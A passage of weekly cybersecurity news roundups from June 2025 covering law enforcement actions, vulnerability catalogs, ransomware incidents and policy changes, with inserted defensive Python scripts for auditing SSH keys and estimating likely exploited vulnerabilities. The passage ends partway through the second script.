Cybersecurity Saturday

From the cybersecurity and law enforcement front,

  • Cyberscoop reports,
    • “A House panel approved a fiscal 2026 funding bill Monday [June 9, 2025] that would cut the Cybersecurity and Infrastructure Security Agency by $135 million from fiscal 2025, significantly less than the Trump administration’s proposed $495 million.
    • “The chairman of the House Appropriations Subcommittee on Homeland Security, Rep. Mark Amodei, said the annual Department of Homeland Security funding measure “responsibly trimmed” the CISA budget. But Illinois Rep. Lauren Underwood, the top Democrat on his panel, said the legislation “fails to address the catastrophic cybersecurity threats facing our critical infrastructure.”
    • “The subcommittee approved the bill by a vote of 8-4.
    • “CISA would get $2.7 billion under the measure, according to a committee fact sheet, or $134.8 million less than the prior year.
    • “While the full committee chairman Tom Cole, R-Okla., said “the bill provides critical support for cybersecurity technology,” Republicans also criticized the agency’s past work.”
  • and
    • “A familiar face is being promoted from within to lead the FBI’s Cyber division.
    • “In a LinkedIn post Sunday [June 8, 2025], Brett Leatherman said that FBI Director Kash Patel had selected him as assistant director and lead official for the FBI’s primary division for investigating cybercrimes. The role is prominent in national security, espionage and counterintelligence investigations.” * * *
    • “Leatherman takes over the reins from Bryan Vorndran, who led the bureau’s Cyber Division from 2021 until this past spring when he left the federal government to take a job as Microsoft’s deputy chief information security officer.”  
  • The National Institute of Standards and Technology (NIST) illustrates “19 Ways to Build Zero Trust Architectures.”
    • “The traditional approach to cybersecurity, built around the idea of solely securing a perimeter, has given way to the zero-trust approach of continuously evaluating and verifying requests for access.
    • “Zero trust architectures can help organizations protect far-flung digital resources from cyberattacks, but building and implementing the right architectures can be a complex undertaking.
    • “New NIST guidance offers 19 example zero trust architectures using off-the-shelf commercial technologies, giving organizations valuable starting points for building their own architectures.”
  • Cyberscoop points out,
    • “Federal authorities on Wednesday [June 11, 2025] announced the seizure of about 145 domains and cryptocurrency funds linked to BidenCash, a cybercrime marketplace for stolen credit cards, compromised credentials and other personal information. 
    • “BidenCash was used by more than 117,000 customers, resulting in the trafficking of more than 15 million credit card numbers and personally identifiable information, the Justice Department said. Administrators of the cybercrime platform, which charged a per-transaction fee, generated more than $17 million in illicit revenue since its formation in March 2022, authorities said.
    • “Domains associated with BidenCash now redirect to a server controlled by U.S. law enforcement and display seizure notices. The U.S. Attorney’s Office for the Eastern District of Virginia, which is leading the case, said it seized cryptocurrency funds the BidenCash marketplace used to receive illicit proceeds from its operations.
    • “Authorities did not disclose the value of those seized cryptocurrency funds or identify the physical location of the administrators and infrastructure used by BidenCash. The U.S. Attorney’s Office for the Eastern District of Virginia did not immediately respond to questions.” 
  • Cybersecurity Dive adds,
    • “An international law enforcement operation has dismantled the computer infrastructure powering multiple strains of information-stealer malware.
    • “As part of “Operation Secure,” authorities in 26 Asian countries “worked to locate servers, map physical networks and execute targeted takedowns,” Interpol said in a statement. Law enforcement agencies worked with cybersecurity firms Group-IB, Kaspersky and Trend Micro to prepare assessments of their targets and shared that information with “cyber teams across Asia,” according to Interpol, resulting “in the takedown of 79 percent of identified suspicious IP addresses.”

From the cybersecurity vulnerabilities and breaches front,

  • The Wall Street Journal reports,
    • “Supermarket shelves are emptying out at some stores around the country, after a cyberattack hit a major distributor to Whole Foods Market and other chains.
    • “United Natural Foods said it detected unauthorized activity on its systems last week and took certain ones offline proactively.
    • “Disruptions to its operations have followed, United Natural said. Stores around the country have reported being unable to place orders. The company has told suppliers that it hopes to restore normal operations by Sunday, according to a notice viewed by The Wall Street Journal.” 
  • CISA added four known exploited vulnerabilities to its catalog this week.
    • June 9, 2025
      • CVE-2025-32433 Erlang Erlang/OTP SSH Server Missing Authentication for Critical Function Vulnerability 
      • CVE-2024-42009 RoundCube Webmail Cross-Site Scripting Vulnerability
        • The Hacker News discusses these KEVs here.
    • June 10, 2025
      • CVE-2025-24016 Wazuh Server Deserialization of Untrusted Data Vulnerability
      • CVE-2025-33053 Web Distributed Authoring and Versioning (WebDAV) External Control of File Name or Path Vulnerability
        • Akamai discusses the “Wazuh Server” KEV here.
        • Security Week discusses the WebDAV KEV here.
  • Cybersecurity Dive adds,
    • “Government agencies are operating with massive amounts of “security debt” — meaning unresolved vulnerabilities — putting them and the public at increased risk of falling victim to hackers, according to a Veracode report released Wednesday [June 11, 2025]. 
    • “Roughly 80% of government agencies have software vulnerabilities that have gone unaddressed for at least a year, and roughly 55% of them have long-standing software flaws that place them at even greater risk, the report found.
    • “Veracode’s research shows that it takes government agencies an average of 315 days to resolve half of their software vulnerabilities, compared to the combined public- and private-sector average of 252 days.
    • “But companies and agencies alike are falling short of the necessary investments and procedures to address insecure software, according to Veracode.”
  • Dark Reading warns
    • “Secure Shell (SSH) keys are the backbone of secure remote access. They are everywhere, powering DevOps pipelines, enabling server management, and automating everything from deployments to patching. But despite their ubiquity, SSH keys often remain a blind spot in enterprise security. Why? Because unlike passwords, they don’t expire. They are easy to create, hard to track, and alarmingly simple to forget.
    • “In large enterprises, it is not uncommon to find hundreds of thousands or even millions of unmanaged SSH keys. Many of these grant access to sensitive systems but lack clear ownership or life-cycle oversight, turning what should be a secure authentication method into a major risk factor.
    • “If your organization cannot answer “Who can log in to what, using which key?” you are flying blind.”
  • Security Week notes,
    • “More than 40,000 security cameras worldwide are exposed to the internet, cybersecurity firm Bitsight warns.
    • “Operating over HTTP or RTSP (Real-Time Streaming Protocol), the cameras expose their live feed to anyone knowing their IP addresses, directly from the web browser, which makes them unintended tools for cyberattacks, espionage, extortion, and stalking, the company says.
    • “The HTTP-based cameras rely on standard web technologies for video transmission and control and are typically found in homes and small offices.
    • “Of the more than 40,000 cameras exposing their live feed, more than 14,000 are in the US, with Japan ranking second, at roughly 7,000 devices. Austria, Czechia, and South Korea have roughly 2,000 exposed cameras each, while Germany, Italy, and Russia have roughly 1,000 each.
    • “In the US, most of the exposed cameras are in California and Texas, followed by Georgia, New York, and Missouri. Massachusetts and Florida have high concentrations of exposed cameras as well.” * * *
    • “To keep these security cameras protected, users should secure their internet connections, replace default credentials, disable remote access if not needed, keep the devices always updated, and monitor them for unusual login attempts.”
  • and
    • “Trend Micro has released patches for ten vulnerabilities in Apex Central and Endpoint Encryption (TMEE) PolicyServer, including critical-severity flaws leading to remote code execution (RCE).
    • “The update for Apex Central resolves two critical bugs leading to RCE, tracked as CVE-2025-49219 and CVE-2025-49220 (CVSS score of 9.8). The security defects are similar, but were discovered in different methods, the company says.
    • “Both vulnerabilities are described as an insecure deserialization operation that could allow remote attackers to execute arbitrary code on affected installations, without authentication.
    • “Endpoint Encryption PolicyServer received fixes for eight flaws, including four critical and four high-severity defects.”
  • Per Bleeping Computer,
    • “Cloudflare has confirmed that the massive service outage yesterday was not caused by a security incident, and no data has been lost.
    • “The issue has been largely mitigated. It started 17:52 UTC yesterday [June 12, 2025] when the Workers KV (Key-Value) system went completely offline, causing widespread service losses across multiple edge computing and AI services.
    • “Workers KV is a globally distributed, consistent key-value store used by Cloudflare Workers, the company’s serverless computing platform. It is a fundamental piece in many Cloudflare services, and a failure can cause cascading issues across many components.”
    • “The disruption also impacted other services used by millions, most notably the Google Cloud Platform.”
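The Dark Reading item above asks “Who can log in to what, using which key?” As an added example (not code from Dark Reading or from this post), the Python script below inventories authorized_keys files collected from several hosts, fingerprints each key the way OpenSSH does (SHA256 of the wire blob), and flags keys that have no owner comment, carry no from=/command= restriction, or are trusted on more than one host. The host names and key contents are constructed sample data.

```python
import base64
import hashlib
import struct

# Key-type tokens this inventory understands (OpenSSH authorized_keys format).
KEY_TYPES = {
    "ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
    "ecdsa-sha2-nistp521", "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
}


def _ssh_string(data: bytes) -> bytes:
    """Encode an SSH wire string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def make_blob(key_type: str, key_material: bytes) -> str:
    """Build a base64 public-key blob whose first field is the key type (used only for sample data)."""
    return base64.b64encode(_ssh_string(key_type.encode()) + _ssh_string(key_material)).decode()


def fingerprint(blob: bytes) -> str:
    """OpenSSH-style fingerprint: SHA256 of the wire blob, base64 without padding."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def parse_line(line: str):
    """Parse one authorized_keys line into a dict, or None for blanks, comments and unparseable lines.

    Limitation: options containing whitespace inside quotes (e.g. command="a b") are not handled.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    # A line may begin with an options field (from=, command=, no-pty, ...); locate the key-type token.
    idx = next((i for i, f in enumerate(fields) if f in KEY_TYPES), None)
    if idx is None or idx + 1 >= len(fields):
        return None
    options = " ".join(fields[:idx]) or None
    key_type, b64 = fields[idx], fields[idx + 1]
    comment = " ".join(fields[idx + 2:]) or None
    try:
        blob = base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    # The wire blob must start with the same key type as the leading token, otherwise it is corrupt.
    if len(blob) < 4:
        return None
    tlen = struct.unpack(">I", blob[:4])[0]
    if blob[4:4 + tlen] != key_type.encode():
        return None
    return {"type": key_type, "fingerprint": fingerprint(blob), "comment": comment, "options": options}


def inventory(host_files: dict) -> dict:
    """Merge authorized_keys contents from many hosts into fingerprint -> where and how the key is trusted."""
    keys = {}
    for host, text in host_files.items():
        for line in text.splitlines():
            rec = parse_line(line)
            if rec is None:
                continue
            entry = keys.setdefault(rec["fingerprint"],
                                    {"type": rec["type"], "comments": set(), "hosts": set(), "restricted": True})
            entry["hosts"].add(host)
            if rec["comment"]:
                entry["comments"].add(rec["comment"])
            # A key counts as restricted only if every placement carries options (from=, command=, ...).
            entry["restricted"] = entry["restricted"] and rec["options"] is not None
    return keys


def findings(keys: dict) -> list:
    """Answer 'who can log in to what, using which key?' and flag keys lacking ownership or scope."""
    report = []
    for fp, e in keys.items():
        problems = []
        if not e["comments"]:
            problems.append("no owner comment")
        if len(e["hosts"]) > 1:
            problems.append(f"present on {len(e['hosts'])} hosts")
        if not e["restricted"]:
            problems.append("unrestricted (no from=/command= option)")
        report.append({"fingerprint": fp, "type": e["type"], "owners": sorted(e["comments"]),
                       "hosts": sorted(e["hosts"]), "problems": problems})
    # Worst offenders first.
    return sorted(report, key=lambda r: (-len(r["problems"]), r["fingerprint"]))


# Constructed sample: authorized_keys contents as they might be collected from three hosts.
KEY_A = make_blob("ssh-ed25519", b"\x01" * 32)
KEY_B = make_blob("ssh-ed25519", b"\x02" * 32)
KEY_C = make_blob("ssh-rsa", b"\x03" * 64)  # stand-in material; real RSA blobs carry e and n
SAMPLE_HOSTS = {
    "build-01": f"# CI host\nssh-ed25519 {KEY_A} alice@laptop\nssh-ed25519 {KEY_B}\n",
    "db-01": f'from="10.0.0.5",command="/usr/bin/backup" ssh-ed25519 {KEY_A} alice@laptop\nssh-rsa {KEY_C}\n',
    "web-01": f"ssh-ed25519 {KEY_B}\nthis line is not a key\n",
}

if __name__ == "__main__":
    for r in findings(inventory(SAMPLE_HOSTS)):
        print(r["fingerprint"], r["type"], "owners=" + (",".join(r["owners"]) or "?"),
              "hosts=" + ",".join(r["hosts"]), "; ".join(r["problems"]) or "ok")
```

Feeding the script real files (one per host) turns the “hundreds of thousands of unmanaged keys” problem into a list of fingerprints with an owner, a host set and a restriction status that can be reviewed and rotated.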

From the ransomware front,

  • The HIPAA Journal informs us,
    • “It has taken three weeks, but Kettering Health has confirmed that it has resumed normal operations for key services following its May 20, 2025, Interlock ransomware attack. Kettering Health has been releasing regular updates on the progress being made restoring its systems, confirming that the core components of its Epic EHR system were restored on the morning of June 2, 2025, which allowed patient data to be entered, and the backlog of data recorded on paper to start to be entered into patient records.
    • “Interlock’s access to its network and system was immediately terminated when the attack was discovered, and Kettering Health confirmed on June 5, 2025, that all of the ransomware group’s tools and persistence mechanisms had been eradicated from its systems. Kettering Health also confirmed that all systems were fully up to date with the latest versions of software installed and patches applied, and security enhancements had been implemented, including network segmentation, enhanced monitoring, and updated access controls. Kettering Health said it is confident that its cybersecurity framework and employee security training are sufficient to mitigate future risks.”
  • Cybersecurity Dive reports,
    • “Ransomware gangs have exploited a vulnerability in the SimpleHelp remote support program to breach customers of a utility billing software vendor, the Cybersecurity and Infrastructure Security Agency (CISA) warned on Thursday [June 12, 2025].
    • “The government advisory follows an earlier warning from CISA and the FBI that hackers associated with the Play ransomware gang had been targeting critical infrastructure organizations using the flaw in SimpleHelp’s remote management software.
    • “The new CISA alert highlights the risks of vendors not verifying the security of their software before providing it to customers.” * * *
    • “In its Thursday alert, CISA said the breach of the utility payment vendor reflected a “broader pattern” of such attacks.
    • “The agency urged “software vendors, downstream customers, and end users to immediately implement the Mitigations listed in this advisory based on confirmed compromise or risk of compromise.” 
    • “Vendors should isolate vulnerable SimpleHelp instances, update the software and warn customers, according to CISA, while customers should determine whether they are running the SimpleHelp endpoint service, isolate and update those systems and follow SimpleHelp’s additional guidance.”
  • Per Bleeping Computer,
    • “Fog ransomware hackers are using an uncommon toolset, which includes open-source pentesting utilities and a legitimate employee monitoring software called Syteca.
    • “The Fog ransomware operation was first observed last year in May leveraging compromised VPN credentials to access victims’ networks.
    • “Post-compromise, they used “pass-the-hash” attacks to gain admin privileges, disabled Windows Defender, and encrypted all files, including virtual machine storage.
    • “Later, the threat group was observed exploiting n-day flaws impacting Veeam Backup & Replication (VBR) servers, as well as SonicWall SSL VPN endpoints.”

From the cybersecurity defenses front,

  • Cybersecurity Dive lets us know,
    • “The threat of cyberattacks represents the most serious challenge for businesses in the coming year, the advisory firm Kroll said in a report published Thursday [June 12, 2025].
    • “Roughly three-quarters of respondents said their cybersecurity and privacy concerns had increased over the past year, with nearly half citing malware and more than a third citing data extortion as specific fears.
    • “Kroll’s survey of 1,200 respondents from more than 20 countries, conducted in February, provides some measure of how businesses are thinking about and dealing with cyber worries as global tensions escalate.”
  • and
    • “Artificial intelligence is poised to transform the work of security operations centers, but experts say humans will always need to be involved in managing companies’ responses to cybersecurity incidents — as well as policing the autonomous systems that increasingly assist them.
    • “AI agents can automate many repetitive and complex SOC tasks, but for the foreseeable future, they will have significant limitations, including an inability to replicate unique human knowledge or understand bespoke network configurations, according to experts who presented here at the Gartner Security and Risk Management Summit.
    • “The promise of AI dominated this year’s Gartner conference, where experts shared how the technology could make cyber defenders’ jobs much easier, even if it has a long way to go before it can replace experienced humans in a SOC.
    • “As the speed, the sophistication, [and] the scale of the attacks [go] up, we can use agentic AI to help us tackle those challenges,” Hammad Rajjoub, director of technical product marketing at Microsoft, said during his presentation. “What’s better to defend at machine speed than AI itself?”
  • Dark Reading explains “Why CISOs Must Align Business Objectives & Cybersecurity. This alignment makes a successful CISO, but creating the same sentiment across business leadership creates a culture of commitment and greatly contributes to achieving goals.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Yesterday, the President issued a cybersecurity executive order. Here is a link to the related fact sheet.
  • Federal News Network adds,
    • “President Donald Trump has signed a new cybersecurity executive order that continues many of the policies of his predecessors, while also marking out some key changes in the approach to software security, digital identity and more.
    • “The new executive order, “Sustaining Select Efforts to Strengthen the Nation’s Cybersecurity,” modifies many aspects of a cyber EO signed by President Joe Biden in January. It also makes changes to executive orders signed by President Barack Obama to focus federal cybersecurity law enforcement efforts on foreign nationals.
    • “But Trump’s new EO continues key aspects of Biden directives, including an effort to strengthen the Cybersecurity and Infrastructure Security Agency’s role in defending civilian federal networks.” * * *
    • “The latest cybersecurity executive order also maintains federal efforts around post-quantum cryptography, Border Gateway Protocol, and advanced encryption.
    • “But it eliminates the January order’s directive for agencies to require federal software vendors to provide evidence of following secure development practices.
    • “Instead, Trump directs the National Institute of Standards and Technology to establish a new consortium with industry “that demonstrates the implementation of secure software development, security, and operations practices” based on NIST’s Secure Software Development Framework.”
  • Per Cybersecurity Dive,
    • “Trump’s elimination of Biden’s software security requirements for federal contractors represents a significant government reversal on cyber regulation. Following years of major cyberattacks linked to insecure software, the Biden administration sought to use federal procurement power to improve the software industry’s practices. That effort began with Biden’s 2021 cyber order and gained strength in 2024, and then Biden officials tried to add teeth to the initiative before leaving office in January. But as it eliminated that project on Friday, the Trump administration castigated Biden’s efforts as “imposing unproven and burdensome software accounting processes that prioritized compliance checklists over genuine security investments.”
    • “Trump’s order eliminates provisions from Biden’s directive that would have required federal contractors to submit “secure software development attestations,” along with technical data to back up those attestations. Also now eradicated are provisions that would have required the Cybersecurity and Infrastructure Security Agency to verify vendors’ attestations, required the Office of the National Cyber Director to publish the results of those reviews and encouraged ONCD to refer companies whose attestations fail a review to the Justice Department “for action as appropriate.”
  • Cyberscoop reports,
    • “Sean Cairncross laid out his vision to senators Thursday for the Office of the National Cyber Director if he is confirmed to lead it.
    • “A goal of mine is to make sure this office sits at the place that this committee and I believe Congress intended in the statute, and that is to lead cyber policy coordination across the federal government,” he told the Homeland Security and Governmental Affairs Committee at his confirmation hearing.
    • “In doing that, working with our interagency partners is vital,” he said. “We’ve been empowered to work with [the Office of Management and Budget] to ensure that budget alignment among the interagency aligns with administration policy, and I think those tools have to be leveraged, and relationships between us and the interagency — it’s making sure that it is monitored and enforced.”
  • Cybersecurity Dive adds,
    • “Two coalitions of cybersecurity companies, professional associations and experts have endorsed Sean Plankey and Sean Cairncross, President Donald Trump’s nominees to serve as director of the Cybersecurity and Infrastructure Security Agency and national cyber director, respectively.
    • “Plankey and Cairncross’s backers include executives at cybersecurity firms, former senior government officials from administrations of both parties and leaders of trade groups and think tanks.”
  • Per Bleeping Computer,
    • “The U.S. Department of State has announced a reward of up to $10 million for any information on government-sponsored hackers with ties to the RedLine infostealer malware operation and its suspected creator, Russian national Maxim Alexandrovich Rudometov.
    • “The same bounty covers leads on state hackers’ use of this malware in cyber operations targeting critical infrastructure organizations in the United States.
    • “This bounty is posted as part of the Department of State’s Rewards for Justice program established by the 1984 Act to Combat International Terrorism, which rewards informants for tips that help identify or locate foreign government threat actors behind cyberattacks against U.S. entities.”
  • Per Cyberscoop,
    • “Federal authorities on Thursday [June 5, 2025] said they seized $7.74 million from North Korean nationals as they attempted to launder cryptocurrency obtained by IT workers who gained illegal employment and funneled the wages to the North Korean regime.
    • “The allegedly illegally obtained funds were linked to Sim Hyon Sop, a representative of North Korean Foreign Trade Bank, and Kim Sang Man, CEO of Chinyong, an outfit associated with North Korea’s Ministry of Defense, the Justice Department said. Both North Korean nationals were added to the Treasury Department’s Office of Foreign Assets Control’s list of sanctioned individuals in 2023.
    • “The cryptocurrency seizure marks another action in a series of long-running law enforcement efforts to identify and prevent North Korean operatives from gaining employment at companies, evading U.S. sanctions, and sending payroll back to the North Korean government.”
  • Per Security Week,
    • “German authorities have named Russian national Vitaly Nikolaevich Kovalev as the founder and leader of the TrickBot cybercrime gang.”
    • “Established in 2016, the TrickBot group is believed to have infected millions of computers worldwide, exfiltrating sensitive information such as credentials, banking and credit card details, and personal information, while also enabling the deployment of other malware, such as ransomware.
    • “Authorities targeted TrickBot’s infrastructure in takedown attempts in 2020 and 2024 and announced charges and sanctions against over a dozen group members in 2023, including Kovalev, believed at the time to be a senior figure within the cybercrime ring.”

From the cybersecurity vulnerabilities and breaches front,

  • CISA added nine known exploited vulnerabilities to its catalog this week.
  • Bleeping Computer tells us,
    • “A threat actor has re-released data from a 2021 AT&T breach affecting 70 million customers, this time combining previously separate files to directly link Social Security numbers and birth dates to individual users.
    • “AT&T told BleepingComputer that they are investigating the data but also believe it originates from the known breach and was repackaged into a new leak.
    • “It is not uncommon for cybercriminals to repackage previously disclosed data for financial gain. We just learned about claims that AT&T data is being made available for sale on dark web forums, and we are conducting a full investigation,” AT&T told BleepingComputer.”
  • and
    • “Cisco has released patches to address three vulnerabilities with public exploit code in its Identity Services Engine (ISE) and Customer Collaboration Platform (CCP) solutions.
    • “The most severe of the three is a critical static credential vulnerability tracked as CVE-2025-20286, found by GMO Cybersecurity’s Kentaro Kawane in Cisco ISE. This identity-based policy enforcement software provides endpoint access control and network device administration in enterprise environments.
    • “The vulnerability is due to improperly generated credentials when deploying Cisco ISE on cloud platforms, resulting in shared credentials across different deployments.”
  • Dark Reading informs us,
    • “ClickFix campaigns are gaining steam according to various security researchers, with recent campaigns spotted across the globe from a wide swath of cyberattackers. The increasingly popular tactic represents a significant new evolution for social engineering, researchers say — and enterprises need to take note.
    • “ClickFix activity has been snowballing: Darktrace said yesterday that it recently identified multiple ClickFix attacks across customer environments in Europe, the Middle East, and Africa (EMEA), and in the United States; while SlashNext, in a separate report, detailed an unusual version of the attack vector that impersonates Cloudflare Turnstile, which is the Web protection company’s CAPTCHA-like Turing test. Also, this week, Cofense outlined a campaign that spoofed Booking.com CAPTCHAs, targeting hotel chains with remote access Trojans (RATs) and infostealers.”
  • and
    • “The Federal Bureau of Investigation (FBI) warned that cybercriminals are compromising Internet of Things (IoT) devices connected to home networks through the BADBOX 2.0 botnet.
    • “The BADBOX 2.0 botnet was discovered several months ago after the original BADBOX campaign was disrupted in 2024. Human Security’s Satori Threat Intelligence and Research team, alongside Google, Trend Micro, the Shadowserver Foundation, and others, were able to partially disrupt the “complex and expansive” BADBOX 2.0 operation, noting that it remains the largest botnet of infected connected TV (CTV) devices ever uncovered.
  • Per Cybersecurity Dive,
    • “A financially motivated hacker group has been targeting Salesforce instances for months in a campaign that uses voice phishing to engage in data theft and follow-on extortion attempts, according to Google Threat Intelligence Group.
    • “The hackers, whom Google tracks as UNC6040, impersonated IT workers and tricked employees at often English-speaking branches of multinational companies into sharing sensitive credentials that were then used to access the organizations’ Salesforce data, Google said in a blog post published Wednesday.
    • “As part of the social engineering campaign, the hackers tricked workers at these companies into visiting the Salesforce-connected app setup page, at which point the attackers used an unauthorized, malicious version of the Salesforce Data Loader app to access and steal sensitive information from the customers’ Salesforce environments. 
    • “Beyond the immediate data thefts, the hackers were able to move laterally within target networks, accessing victims’ other cloud services and moving into internal corporate networks.”

From the ransomware front,

  • The American Hospital Association warns,
    • “The FBI, Cybersecurity and Infrastructure Security Agency and Australian Cyber Security Centre June 4 released an advisory on updated actions and tactics used by the Play ransomware group. The group, active since 2022, has impacted a wide range of businesses and critical infrastructure in North America, South America and Europe. As of May, the FBI was aware of about 900 victims allegedly exploited by the group’s efforts.
    • “The threat actors are presumed to be a closed group, designed to “guarantee the secrecy of deals,” according to a statement on the group’s data leak website. They employ a double-extortion model that encrypts systems after exfiltrating data. Their ransom notes do not include an initial ransom demand or payment instructions. Instead, victims are instructed to contact the threat actors via email.
    • “Play ransomware was among the most active cyberthreat groups in 2024,” said Scott Gee, AHA deputy national advisor for cybersecurity and risk. “This report highlights their evolving tactics, and health care cybersecurity teams should be aware of the changes. As threat actors shift tactics, it is critical that network defenders keep pace. The double-layered extortion model and encryption of systems, as well as theft of data, pose a serious potential risk to hospitals and the delivery of health care.”
  • Cybersecurity Dive adds,
    • “Since mid-January, multiple ransomware groups, including initial access brokers affiliated with Play, have targeted vulnerabilities in a remote support tool called SimpleHelp. Researchers disclosed those flaws in January.  
    • “The new advisory updates the government’s original December 2023 warning about the Play ransomware group, which is also known as PlayCrypt. The hackers have previously been blamed for attacks targeting ConnectWise ScreenConnect and Rackspace.
    • “The recent attacks exploiting SimpleHelp involve three flaws discovered by security firm Horizon3.ai.”
  • Bleeping Computer lets us know,
    • “Healthcare giant Kettering Health, which manages 14 medical centers in Ohio, confirmed that the Interlock ransomware group breached its network and stole data in a May cyberattack.
    • “Kettering Health operates over 120 outpatient facilities and employs over 15,000 people, including over 1,800 physicians.
    • “The healthcare network noted in a Thursday statement that its network devices have been secured, and its team is now working on re-establishing communication channels with patients disrupted by the outage triggered by last month’s ransomware attack.”
  • Security Week adds,
    • “American media company Lee Enterprises revealed this week that the disruptive cyberattack it dealt with earlier this year resulted in a data breach impacting nearly 40,000 individuals.
    • “Lee Enterprises owns 350 weekly and specialty publications across 25 states, and dozens of them suffered disruptions in February as a result of a ransomware attack that involved the encryption of critical applications and the theft of files.
    • “The company informed the Maine Attorney General’s Office this week that it recently completed its investigation into the incident and determined that personal information was compromised.
    • “According to Lee Enterprises, the attackers may have obtained the information of 39,779 people, including their names and Social Security numbers.
    • “Affected individuals are being offered 12 months of free credit monitoring and identity protection services.”
  • Honeywell lets us know,
    • “In a growing wave of sophisticated cyber threats against the industrial sector, ransomware attacks jumped by 46% from Q4 2024 to Q1 2025, according to Honeywell’s new 2025 Cybersecurity Threat Report. The research also found that both malware and ransomware increased significantly in this period and included a 3,000% spike in the use of one trojan designed to steal credentials from industrial operators.”
    • “To learn more and download the full report, visit our website.”

From the cybersecurity business and defenses front,

  • Cybersecurity Dive reports,
    • “Microsoft and CrowdStrike will lead a cooperative effort to map out the overlapping web of hacker groups that their researchers have disclosed and named, the companies said on Monday. 
    • “Palo Alto Networks and Google and its Mandiant unit have also agreed to join the collaborative effort on streamlining threat group taxonomy.
    • “For years, the companies’ different naming conventions for various criminal and state-linked threat groups have created unnecessary confusion and delays in the sharing of threat intelligence.
    • “Microsoft and CrowdStrike released an initial version of their threat actor matrix on Monday, listing the groups they track and each one’s corresponding aliases from other researchers.”
  • The Wall Street Journal reports,
    • “CrowdStrike swung to a loss in the fiscal first quarter and posted a lower-than-expected outlook, as the costs of its outage last summer continue to weigh on results.
    • “The cybersecurity company said Tuesday its revenue is still being hurt by an incentive program it launched last year to try to retain customers after a widespread software outage in July.
    • “CrowdStrike had implemented a customer-commitment program, which let customers try some products for free, and was weighing on its subscription revenue. The program wrapped up at the end of fiscal-year 2025, but its effects are lingering.”
  • Dark Reading tells us,
    • F5 this week announced the acquisition of Fletch, a San Francisco-based startup with agent-based artificial intelligence (AI) technology that analyzes massive amounts of threat intelligence data and remediates the most severe vulnerabilities in real time.
    • “Terms of the deal were not disclosed, but most of Fletch’s 15 employees have joined F5, which was seeking the technology and expertise to bring agentic AI capabilities to the recently introduced F5 Application Delivery and Security Platform (ADSP).”
  • Help Net Security points out,
    • “Cybersecurity leaders and consultants identified AI-driven automation and cost optimization as top organizational priorities, according to Wipro. 
    • “30% of respondents are investing in AI automation to enhance their cybersecurity operations. AI-driven automation can help in detecting and responding to threats more quickly and accurately, thereby reducing the need for extensive manual intervention. 
    • “26% of respondents are focusing on tools rationalization. This approach involves evaluating and consolidating duplicate security tools across platforms to eliminate redundancies and improve efficiency while reducing costs. 
    • “Another significant area is security and risk management process optimization, with 23% of organizations targeting this for cost savings. Streamlining these processes can lead to more effective risk management and better allocation of resources. Apart from these priorities, 20% are focusing on simplifying operating models to achieve better visibility and faster response across reduced attack surfaces.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

Cybersecurity policy and law enforcement,

  • Helpnet Security tells us,
    • “NIST has introduced a new way to estimate which software vulnerabilities have likely been exploited, and it’s calling on the cybersecurity community to help improve and validate the method.
    • “The new metric, “Likely Exploited Vulnerabilities” (LEV), aims to close a key gap in vulnerability management: identifying which of the thousands of reported flaws each year are actually being used in real-world attacks.
    • “Organizations typically rely on two main tools for this: the Exploit Prediction Scoring System (EPSS), which estimates the chance of future exploitation, and Known Exploited Vulnerability (KEV) lists like the one maintained by CISA. But both have limits. EPSS is predictive and doesn’t account for past exploitation, while KEV lists are confirmed cases but often incomplete.
    • “LEV aims to bridge that gap by calculating the probability that a vulnerability has been exploited in the past, based on historical EPSS data. It’s a statistical estimate, not a confirmation, which is why the whitepaper emphasizes that LEV is meant to augment, not replace, existing methods.” * * *
    • The researchers outline four key ways LEV could be used:
      • 1. Estimate how many vulnerabilities have been exploited.
      • 2. Check how complete KEV lists are.
      • 3. Identify high-risk vulnerabilities missing from those lists.
      • 4. Fix blind spots in EPSS, which sometimes underestimates risk for already-exploited bugs.
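As an added worked example (not code from NIST or from the Help Net Security article), here is one way to turn a CVE's EPSS history into a LEV-style estimate and then run the four use cases above against a KEV list. It assumes the composition rule that LEV is the probability that at least one 30-day EPSS window saw exploitation, treating windows as independent and scaling a trailing partial window by the fraction of it that falls inside the date range; the CVE ids, EPSS values and KEV entries are constructed.

```python
"""LEV-style estimate from EPSS history, plus KEV gap checks (added example).

Assumption (not taken from the page): each EPSS score is the probability of
exploitation in the next 30 days, successive windows are independent, and a
trailing window that runs past the end date is weighted by the fraction of it
inside the range. The data below is constructed for illustration.
"""
from bisect import bisect_right
from datetime import date, timedelta

WINDOW_DAYS = 30  # EPSS is a 30-day probability of exploitation


def score_on(history, day):
    """history: list of (date, epss) sorted by date.

    Returns the EPSS score in force on `day` (latest entry on or before it),
    or 0.0 if no score has been published yet.
    """
    dates = [d for d, _ in history]
    i = bisect_right(dates, day)
    return history[i - 1][1] if i else 0.0


def lev(history, d0, dn):
    """Probability the CVE was exploited at least once between d0 and dn."""
    if dn < d0:
        raise ValueError("dn must not precede d0")
    p_never = 1.0  # probability no window saw exploitation
    di = d0
    while di <= dn:
        days_left = (dn - di).days
        weight = min(days_left, WINDOW_DAYS) / WINDOW_DAYS  # partial last window
        p_never *= 1.0 - score_on(history, di) * weight
        di += timedelta(days=WINDOW_DAYS)
    return 1.0 - p_never


def kev_gap_report(histories, kev, d0, dn, threshold=0.5, low_epss=0.1):
    """Apply the four LEV use cases to a set of CVEs.

    histories: {cve: [(date, epss), ...]}; kev: set of CVE ids on the KEV list.
    """
    scores = {cve: lev(h, d0, dn) for cve, h in histories.items()}
    # 1. expected number of exploited CVEs = sum of per-CVE probabilities
    expected_exploited = sum(scores.values())
    # 2. KEV completeness: listed CVEs relative to the expected exploited count
    coverage = (len(kev & set(scores)) / expected_exploited
                if expected_exploited else None)
    # 3. high-LEV CVEs absent from KEV
    missing = sorted(c for c, s in scores.items()
                     if s >= threshold and c not in kev)
    # 4. EPSS blind spots: likely already exploited, yet current EPSS is low
    underestimated = sorted(c for c, s in scores.items()
                            if s >= threshold
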